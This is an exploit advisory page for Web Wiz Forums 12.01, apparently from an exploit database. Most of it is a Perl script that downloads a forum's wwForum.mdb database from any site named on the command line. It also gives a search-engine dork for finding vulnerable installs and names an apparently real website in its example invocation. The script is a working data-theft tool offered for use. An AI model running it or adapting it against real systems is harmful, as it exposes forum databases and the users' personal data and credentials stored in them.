Web Wiz Forums 12.01 Database Disclosure Exploit

2019.03.03
dz indoushka (DZ) dz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

==================================================================================================================================== | # Title : Web Wiz Forums 12.01 Database Disclosure Exploit | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0.1(32-bit) | | # Vendor : http://webwiz.net/web-wiz-forums/forum-downloads.htm | | # Dork : Forum Software by Web Wiz Forums® version 12.01 Copyright ©2001-2018 Web Wiz Ltd. | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] save exploit at poc.pl use LWP::Simple; use LWP::UserAgent; system('cls'); print"[+] Web Wiz Forums 12.01 Database Disclosure Exploit By indoushka \n\n"; system('color a'); if(@ARGV < 2) { print "[-] How To Use\n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ \n"; print "[+] usage2 : perl $0 localhost / \n"; } ($TargetIP, $path, $File,) = @ARGV; $File="database/wwForum.mdb"; my $url = "http://" . $TargetIP . $path . $File; print "\n Fuck you wait!!! \n\n"; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "D:/wwForum.mdb"); if ($request->is_success) { print "[+] $url Exploited!\n\n"; print "[+] Database saved to D:/wwForum.mdb\n"; exit(); } else { print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n"; exit(); } [+] Example : poc.pl www.kleenkuip.com /forum/ Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | =======================================================================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top